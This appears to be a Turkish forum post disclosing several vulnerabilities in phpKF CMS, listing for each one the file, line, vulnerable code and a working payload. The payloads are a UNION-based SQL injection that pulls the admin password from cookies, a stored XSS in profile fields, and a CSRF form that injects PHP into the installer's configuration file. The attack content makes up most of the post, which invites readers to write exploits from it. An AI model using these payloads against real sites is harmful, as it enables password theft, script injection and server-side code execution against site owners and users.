B
blackdewil
dün @Mectruy nin paylaştığı scriptte can sıkıntısına bulduğum üç beş açığı topladım. incelemek isteyen exploit yazmak isteyen vs olursa bakabilir.
SQL Injection:
phpkf-yonetim/phpkf-bilesenler/guvenlik.php
Line : 69
payload:
XSS Vuln:
/uye-profil.php?kp=degistir
payload:
injectable area : Imza and Hakkinda
CSRF Vuln:
phpkf-yonetim/guncelle.php
Line : 29
PoC:
siteden okumak isteyen olursa : http://kendinemuslum4n.blogspot.com/2019/05/phpkf-multi-vulnerabilities-sql.html
SQL Injection:
phpkf-yonetim/phpkf-bilesenler/guvenlik.php
Line : 69
Code:
$vtsorgu = "SELECT id,yonetim_kimlik,kullanici_kimlik,yetki,son_hareket,kul_ip FROM $tablo_kullanicilar WHERE yonetim_kimlik='$_COOKIE[yonetim_kimlik]' AND kullanici_kimlik='$_COOKIE[kullanici_kimlik]' LIMIT 1";
payload:
Code:
%bf%27 UNION SELECT sifre FROM phpkfcms_kullanicilar WHERE id='1
XSS Vuln:
/uye-profil.php?kp=degistir
payload:
Code:
<script>alert(1)</script>
injectable area : Imza and Hakkinda
CSRF Vuln:
phpkf-yonetim/guncelle.php
Line : 29
Code:
if ( (isset($_POST['kurulum_yapildi'])) AND (isset($_POST['ayar_bilgi'])) AND ($_POST['kurulum_yapildi'] == 'ayar_dosyasi') )
PoC:
Code:
<form action = "http://localhost/phpkf-cms/phpkf-kurulum/guncelle.php" method = "POST">
<input type = "hidden" name = "kurulum_yapildi" value = "ayar_dosyasi">
<input type = "hidden" name = "ayar_bilgi" value = "<?=phpinfo();?>">
<input type = "submit" value = "git">
</form>
<span>b4style</span>
siteden okumak isteyen olursa : http://kendinemuslum4n.blogspot.com/2019/05/phpkf-multi-vulnerabilities-sql.html